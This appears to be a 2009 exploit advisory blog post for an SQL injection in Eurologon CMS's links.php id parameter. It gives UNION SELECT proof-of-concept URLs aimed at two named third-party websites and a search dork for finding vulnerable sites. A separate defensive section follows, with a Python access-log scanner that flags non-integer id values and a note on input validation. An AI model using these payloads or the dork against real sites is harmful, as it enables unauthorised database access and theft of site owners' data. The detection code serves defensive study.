Software : Eurologon Content Management System
Vendor : http://www.content-manager.it/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/
[o] Vulnerable file
links.php
[o] Exploit
http://localhost/[path]/links.php?id=[SQL]
[o] Proof of concept
http://www.ream.it/links.php?id=5+AND+1=2+UNION+SELECT+1,2,3,4,version(),6/*
http://www.fondazionefabretti.it/links.php?id=21+AND+1=2+UNION+SELECT+1,2,3,4,version(),6,7,8,9,10,11,12,13,14/*
[o] Dork
"Powered by Eurologon"
[o] Notes
This is a private script.
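A defender-side check for the issue described above, as an added example that is not part of the original advisory or the vendor's code: it scans web access logs for links.php requests whose id parameter is not a plain integer. It assumes legitimate id values are numeric (as in the id=5 and id=21 requests above) and uses constructed log lines with documentation IP addresses.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines; IPs are documentation addresses.
SAMPLE_LOG = """\
192.0.2.10 - - [14/Dec/2009:06:20:01 +0000] "GET /links.php?id=5 HTTP/1.1" 200 5120
192.0.2.77 - - [14/Dec/2009:06:21:13 +0000] "GET /links.php?id=5+AND+1=2+UNION+SELECT+1,2,3,4,version(),6/* HTTP/1.1" 200 5188
192.0.2.77 - - [14/Dec/2009:06:21:40 +0000] "GET /links.php?id=21%20and%201%3D2 HTTP/1.1" 200 4001
192.0.2.10 - - [14/Dec/2009:06:22:02 +0000] "GET /news.php?id=abc HTTP/1.1" 200 900
192.0.2.10 - - [14/Dec/2009:06:23:02 +0000] "GET /cms/links.php?id=21 HTTP/1.1" 200 900
"""

# Client address and request target from a common/combined log format line.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*"')
INTEGER_RE = re.compile(r"[0-9]+")


def suspicious_links_requests(log_text):
    """Return (client_ip, decoded_id) for links.php requests with a non-integer id."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue
        client, target = match.groups()
        url = urlsplit(target)
        # Match the script wherever the CMS is installed ([path]/links.php).
        if not url.path.endswith("/links.php"):
            continue
        # parse_qs decodes %XX and '+', so encoded payloads are checked in clear form.
        for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
            if not INTEGER_RE.fullmatch(value):
                hits.append((client, value))
    return hits


if __name__ == "__main__":
    for client, value in suspicious_links_requests(SAMPLE_LOG):
        print(f"{client}\tid={value!r}")
```

The same integer-only rule is the fix on the application side: links.php should reject or cast any id that is not a plain integer before it reaches the query, and bind it as a query parameter.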
Monday, December 14, 2009
Eurologon CMS SQL Injection Vuln
6:25 AM
matthews